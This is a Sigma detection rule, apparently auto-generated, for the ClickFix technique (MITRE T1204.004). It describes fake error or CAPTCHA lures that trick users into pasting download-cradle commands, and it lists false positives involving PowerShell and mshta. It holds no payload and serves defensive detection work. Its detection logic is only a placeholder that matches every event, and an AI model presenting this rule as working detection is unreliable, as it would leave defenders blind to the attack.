title: Malicious Copy and Paste (T1204.004)
id: df00tech-t1204-004
status: experimental
description: "Adversaries may rely upon a user copying and pasting code to gain execution (ClickFix). Victims are presented with fake error messages, CAPTCHA prompts, or troubleshooting instructions on malicious websites or in phishing emails that instruct them to open a terminal, Windows Run dialog, or command prompt and paste a pre-supplied command. The pasted command typically includes download cradles, encoded payloads, or inline scripts designed to establish a foothold on the victim machine. ClickFix bypasses email filtering, browser sandboxing, and file execution controls because the user themselves executes the payload. Threat actors including Contagious Interview (DPRK-linked), Havoc C2 operators, and Lumma Stealer distribution campaigns have heavily leveraged this technique against enterprise users."
references:
  - https://attack.mitre.org/techniques/T1204/004/
  - https://df00tech.com/detections/T1204.004
author: df00tech
date: 2026/04/19
tags:
  - attack.t1204.004
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - IT administrators opening PowerShell from Run dialog (Win+R → powershell) for legitimate admin tasks — suppress by allowlisting specific known-good command line patterns tied to documented admin workflows
  - "Software installation scripts that launch PowerShell from explorer.exe context during user-initiated installs (e.g., clicking a setup.exe in Explorer that chains to PowerShell)"
  - Browser native messaging hosts spawned by browser extensions for legitimate inter-process communication — these typically lack download cradle patterns but may share the browser-parent signal
  - Enterprise HTA applications (mshta.exe) that fetch content over HTTP from internal corporate servers — allowlist by internal IP/domain ranges in the ProcessCommandLine filter
level: high